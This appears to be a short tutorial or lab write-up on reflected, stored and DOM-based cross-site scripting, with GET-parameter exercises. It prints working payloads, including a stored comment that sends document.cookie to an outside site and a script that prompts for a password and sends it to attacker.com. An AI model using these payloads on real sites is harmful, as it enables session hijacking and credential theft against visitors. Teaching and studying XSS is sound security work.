XSS is the most common web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. The three known types of XSS vulnerabilities that we will cover are: Reflected XSS Stored XSS * DOM Based XSS
console.log('Does this even work?'); alert('I am a bAd@$$ H@cK3r');
In these exercises we are going to be using GET request exploits. So we will edit the inputs directly in the GET url.
You should get a popup window on your screen with the word "hello".
We can also redirect the user to different website of our desire.
?firstname=simeon&lastname= <script>window.location= "http://www.simeonkakpovi.com";</script>
Although this may seem benign, it really gets malicious when you send the user's credentials also with it. The receiving website could parse the credentials without you ever knowing.
Alternatively, we can paste a link or image on the page which would take some action when the user clicks or hovers over it.
<a onmouseover='alert("you’ve been pwned")’>Kakpovi</a>
In a stored XSS attack, the input is actually displayed to all other users that visit the site. Take for example a blog, or a comment section.
The following examples could be used to compromise visiting users.
<a onmouseover="alert('just kidding, youve been pwned')">Hello I am just an innocent comment</a> <a href=“youtube.com” onmouseover='window.location="http://simeonkakpovi.com ?content="+document.cookie'>Hello I am just an innocent comment</a> <script>alert("We need your password!");password=prompt("Enter password...","");document.location="http://attacker.com/catch.php ?password="+encodeURI(password);</script>